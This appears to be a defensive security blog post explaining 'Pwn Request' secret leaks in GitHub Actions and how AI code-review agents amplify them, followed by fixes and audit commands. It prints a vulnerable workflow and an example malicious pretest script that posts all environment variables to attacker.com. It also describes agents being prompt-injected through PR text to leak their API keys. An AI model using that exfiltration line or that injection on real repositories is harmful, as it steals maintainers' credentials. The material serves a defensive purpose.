Skip to main content
ShipSafe
All posts
GitHub ActionsPwn RequestClaude CodeSecurity

Pwn Request Meets AI Agents: How GitHub Workflows Leak Your Secrets

pull_request_target plus actions/checkout of the PR ref equals secrets in the attacker's hands. Add a Claude Code agent on top and you get exfil from a single PR. Here's the pattern and the fix.

8 min read

You set up a GitHub Action that runs Claude Code on incoming PRs. You used pull_request_target because Anthropic's example used it. You added actions/checkout with ref: $${{ github.event.pull_request.head.sha }} because you wanted the agent to see the actual PR code.

You just built a Pwn Request. A complete stranger can open a PR with malicious code, your workflow checks it out and runs it with your GITHUB_TOKEN and your ANTHROPIC_API_KEY attached, and they walk away with everything.

Pwn Request has been a known pattern for years. Adding AI agents on top didn't fix it. It made the surface area bigger and the audience much larger.

1. The Pwn Request pattern in 30 lines

The vulnerable shape:

# .github/workflows/ai-review.yml
name: AI PR Review
on:
  pull_request_target:  # ← runs with secrets

jobs:
  review:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}  # ← attacker code

      - name: Run agent
        env:
          ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
        run: |
          npm install
          npm test  # ← runs attacker's package.json scripts
          claude-code review .

The attacker's PR modifies package.json to add a pretest script:

{
  "scripts": {
    "pretest": "curl -X POST https://attacker.com/x -d \"$(env)\"",
    "test": "echo ok"
  }
}

The workflow runs npm test. npm runs pretest first. Every env var — including the secrets — gets POSTed to the attacker. Total time from PR-open to credential-stolen: seconds. The maintainer doesn't have to approve anything; the workflow runs automatically on every PR.

2. Why pull_request_target exists at all

The trigger was designed for legitimate cases that need secrets but don't need to run PR code:

  • Labeling a PR based on its files
  • Commenting "thanks for your contribution!" with a bot
  • Posting a coverage diff using only the base branch's test data
  • Auto-merging Dependabot PRs after CI passes

None of those need to check out the PR's code. They read the diff or metadata. The trigger is fine for that.

The bug is the combination: pull_request_target plus actions/checkout of the PR head plus any execution of the checked-out code. Each piece is fine in isolation. Together they hand secrets to anyone who can open a PR.

3. The AI-agent amplifier

Pwn Request was a known pattern before AI agents. GitHub Security Lab has a five-year-old post about it. Researchers have used it on Microsoft, Google, and Nvidia repos. So why is this a 2026 story?

Two reasons:

  • AI agent workflows want PR code in context. "Review this PR" or "run the tests and tell me what failed" both require the workflow to see the PR code. Lots of newcomers reach for pull_request_target without knowing the history.
  • AI providers add a second exfil path. Even without malicious code in the PR, the agent reading the PR title or body can be prompt-injected (the Comment and Control attack). If the workflow has ANTHROPIC_API_KEY attached because it's pull_request_target, that key leaks via the agent's own tool calls.

The attacker now has two parallel paths to the same prize. Block path one (the classic Pwn Request), they take path two (Comment and Control). Block path two with prompt hardening, they take path one. You need both fixed, and the right architecture closes both at once.

4. Fix 1: just use pull_request

The simplest fix:

name: AI PR Review
on: pull_request   # ← not pull_request_target

jobs:
  review:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        # No ref needed — pull_request defaults to the PR head
      - name: Run agent
        env:
          ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
        run: claude-code review .

Wait — that still has secrets and PR code. Yes. But: pull_request from a fork doesn't have access to secrets unless you explicitly opt in. By default, forked PRs run with no secrets attached. The agent will fail to call Anthropic — which is what you want. The maintainer can re-trigger the workflow manually after reviewing, which then runs with secrets.

This breaks the "automatic AI review on every PR" UX. If you want that UX, use Fix 2.

5. Fix 2: split into two workflows

The right architecture for automatic AI review:

Workflow A — runs on pull_request, no secrets

name: AI Review (build)
on: pull_request

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Static analysis only
        run: |
          # Pure static analysis. No npm install. No agent calls.
          # Just generate facts about the PR.
          npx --no-install some-static-analyzer --output review.json
      - uses: actions/upload-artifact@v4
        with:
          name: review-data
          path: review.json

Workflow B — runs after A, has secrets, doesn't see PR code

name: AI Review (post)
on:
  workflow_run:
    workflows: ["AI Review (build)"]
    types: [completed]

jobs:
  post:
    if: ${{ github.event.workflow_run.conclusion == 'success' }}
    runs-on: ubuntu-latest
    steps:
      - uses: actions/download-artifact@v4
        with:
          name: review-data
          run-id: ${{ github.event.workflow_run.id }}
      - name: Validate schema
        # Reject if review.json doesn't match expected shape.
        run: jq -e '.findings | type == "array"' review.json
      - name: Comment with agent
        env:
          ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
        run: |
          claude-code summarize-findings review.json --post-to-pr

Workflow A has PR code, no secrets. Workflow B has secrets, only sees validated JSON. A malicious PR can break A (no consequence — no secrets attached). It cannot reach B (B doesn't check out the PR; it only reads a strict-schema artifact). The agent never touches attacker-controlled source.

6. Audit your repo

# Any workflow using pull_request_target?
rg -l 'pull_request_target' .github/workflows/

# Of those, any that also check out the PR ref?
rg -l 'pull_request_target' .github/workflows/ | \
  xargs rg -l 'pull_request.head' | \
  xargs rg -l 'actions/checkout'

# Any workflow running an AI agent on PR content?
rg -l 'claude-code|copilot|codex|gemini|aider' .github/workflows/

Each hit on the second query is a Pwn Request candidate — fix immediately. Each hit on the third needs the Comment-and-Control hardening from the linked post. ShipSafe rule ai-agent/pwn-request-checkout automates the second query.

The bottom line

AI agents in CI are not a new attack surface. They're an old one (GitHub Actions) with a louder amplifier (LLM tool-calls + provider keys). The fix is the same architecture that worked for non-AI Pwn Request: never let untrusted code and privileged credentials live in the same job.

Related: Comment and Control for the prompt-injection half of the same problem.

Is your app cooked?

Paste your GitHub URL. 2 minutes. We'll tell you exactly what AI missed — free, no card.

Scan My App Free